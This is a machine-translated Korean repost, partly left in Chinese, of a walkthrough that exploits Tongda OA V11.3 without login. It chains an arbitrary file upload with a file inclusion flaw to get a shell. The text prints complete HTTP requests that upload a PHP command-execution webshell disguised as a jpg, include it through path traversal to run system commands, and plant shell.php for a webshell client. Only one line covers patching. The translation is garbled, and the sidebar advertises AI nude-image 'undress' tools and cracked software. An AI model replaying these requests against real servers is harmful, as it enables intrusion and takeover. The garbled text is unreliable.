찾다
운영 및 유지보수안전Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

1. 취약점 소개

Tongda OA 소개:

Tongda OA(Office Anywhere 네트워크 지능형 오피스 시스템)는 Beijing Tongda Xinke Technology Co., Ltd., Beijing Tongda Xinke에서 독립적으로 개발한 협업 사무 자동화 소프트웨어입니다. Technology Co., Ltd. 공동 관리 소프트웨어 연구 개발 및 구현, 서비스 및 컨설팅을 주요 사업으로 하는 하이테크 팀입니다. 이는 국내 공동 관리 소프트웨어 업계의 유일한 중심 기업이자 중국 공동 관리 소프트웨어의 선두 기업입니다.

Tongda OA는 프로세스 승인, 행정 사무, 일상 업무, 데이터 통계 분석, 인스턴트 메시징, 모바일 오피스 등 다양한 산업 분야의 다양한 규모의 많은 사용자를 위한 정보 관리 기능을 제공하여 사용자의 통신 및 관리 비용을 절감하고 개선을 돕습니다. 생산 및 의사결정 효율성. 시스템은 선도적인 B/S(브라우저/서버) 운영 방식을 채택하여 네트워크 사무실을 지역에 구애받지 않게 만듭니다. Tongda Office Anywhere는 WEB 기반 엔터프라이즈 컴퓨팅을 사용하며, 메인 HTTP 서버는 안정적이고 신뢰할 수 있는 성능을 갖춘 세계 최고 수준의 Apache 서버를 사용합니다. 데이터 액세스를 중앙 집중식으로 제어하여 데이터 유출 가능성을 방지합니다. 시스템 데이터 보안을 보호하기 위해 데이터 백업 도구를 제공합니다. 다단계 권한 제어, 완전한 비밀번호 확인 및 로그인 확인 메커니즘은 시스템 보안을 더욱 강화합니다.

취약점의 영향을 받는 버전은

V11 버전, 2017 버전, 2016 버전, 2015 버전, 2013 향상된 버전, 2013 버전입니다.

비고:

로그인 없이 프런트 데스크에서 취약점을 악용할 수 있습니다.

2013 버전:

파일 업로드 취약점 경로:/ispirit/im/upload.php

파일에 취약점 경로:/ispirit이 포함되어 있습니다. /interface/gateway .php

2017 버전:

파일 업로드 취약점 경로:/ispirit/im/upload.php

파일에 취약점 경로 포함:/mac/gateway.php

취약 환경:

대상 시스템 (Windows Server 2008 R2) IP: 172.16.0.45

Tongda OA: V 11.3 version

2. 환경 설정

(1) Tongda OA V11.3 버전을 다운로드한 후, 해당 애플리케이션 실행 파일을 클릭하여 TDOA11을 실행합니다. .3

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(2) 포트 80이 사용되지 않았는지 확인하고 포트 80에서 애플리케이션을 빌드한 후 다음을 클릭합니다.

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(3) 구성이 완료되었습니다

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

( 4) 구축된 결과 보기

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(5) 계정은 admin, 비밀번호는 비어 있으며 백엔드 시스템에 로그인

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

3. 취약점 재현

3.1 임의 명령 실행

(2) 로그인 필요 없음 임의 파일 업로드의 프런트엔드 취약점을 통해 공격자는 데이터 패킷을 가로채고, 데이터 패킷을 수정 및 재생하고, 접미사 jpg

POST /ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: closeContent-Length: 660------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php $command=$_POST[&#39;cmd&#39;];$wsh = new COM(&#39;WScript.shell&#39;);$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh2YB4pV8McGB--
가 붙은 트로이 목마 파일을 업로드하여 시스템을 공격할 수 있습니다.

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(2) 실행 결과 확인

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(3) 프런트엔드 파일에 취약점 있음: 앞서 업로드한 jpg 트로이 목마 파일이 포함되도록 데이터 패키지를 수정, 임의의 명령 실행 가능

" net user" here

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 71json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=net user

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(4) 프런트엔드 파일 취약점 포함: 이전에 업로드한 jpg 트로이 목마 파일을 포함하도록 데이터 패키지를 수정하면 임의의 명령을 실행할 수 있습니다

여기에서 "ipconfig" 명령을 실행하세요

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=ipconfig

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

3.2 getshell

(1) 프론트 데스크 임의 파일 업로드 취약점 : 모든 데이터 패킷을 캡쳐하고, 재생을 위해 데이터 패킷을 수정하고, 접미사가 jpg인 트로이 목마 파일을 업로드합니다(트로이 목마 파일은 파일 쓰기를 수행함) 조작)

POST /ispirit/im/upload.php HTTP/1.1

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(2)查看运行结果

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예(3)查看/webroot/ispirit/interface/目录下的文件信息

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,会在文件包含的根目录下生成一个 shell.php 文件

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/213131861.jpg"}&cmd=ipconfig

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(5)查看文件包含漏洞的执行结果

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

(6)使用冰蝎进行连接:http://172.16.0.45/ispirit/interface/shell.php

密码为:pass

PS:此处用蚁剑和菜刀无法进行连接

Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예

四、加固建议

我们建议通达OA用户使用受影响版本登录通达OA官网,并获取最新的补丁。请根据当前OA版本选择所对应的程序文件,运行前请先做好备份。

위 내용은 Tongda OA 프론트엔드의 임의 파일 업로드 취약점 및 파일 포함 취약점으로 인해 발생하는 getshell 분석 예의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

성명
이 기사는 亿速云에서 복제됩니다. 침해가 있는 경우 admin@php.cn으로 문의하시기 바랍니다. 삭제

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

인기 기사

R.E.P.O. 에너지 결정과 그들이하는 일 (노란색 크리스탈)
1 몇 달 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 최고의 그래픽 설정
1 몇 달 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 아무도들을 수없는 경우 오디오를 수정하는 방법
1 몇 달 전By尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. 채팅 명령 및 사용 방법
1 몇 달 전By尊渡假赌尊渡假赌尊渡假赌

뜨거운 도구

SublimeText3 영어 버전

SublimeText3 영어 버전

권장 사항: Win 버전, 코드 프롬프트 지원!

SecList

SecList

SecLists는 최고의 보안 테스터의 동반자입니다. 보안 평가 시 자주 사용되는 다양한 유형의 목록을 한 곳에 모아 놓은 것입니다. SecLists는 보안 테스터에게 필요할 수 있는 모든 목록을 편리하게 제공하여 보안 테스트를 더욱 효율적이고 생산적으로 만드는 데 도움이 됩니다. 목록 유형에는 사용자 이름, 비밀번호, URL, 퍼징 페이로드, 민감한 데이터 패턴, 웹 셸 등이 포함됩니다. 테스터는 이 저장소를 새로운 테스트 시스템으로 간단히 가져올 수 있으며 필요한 모든 유형의 목록에 액세스할 수 있습니다.

Eclipse용 SAP NetWeaver 서버 어댑터

Eclipse용 SAP NetWeaver 서버 어댑터

Eclipse를 SAP NetWeaver 애플리케이션 서버와 통합합니다.

VSCode Windows 64비트 다운로드

VSCode Windows 64비트 다운로드

Microsoft에서 출시한 강력한 무료 IDE 편집기

에디트플러스 중국어 크랙 버전

에디트플러스 중국어 크랙 버전

작은 크기, 구문 강조, 코드 프롬프트 기능을 지원하지 않음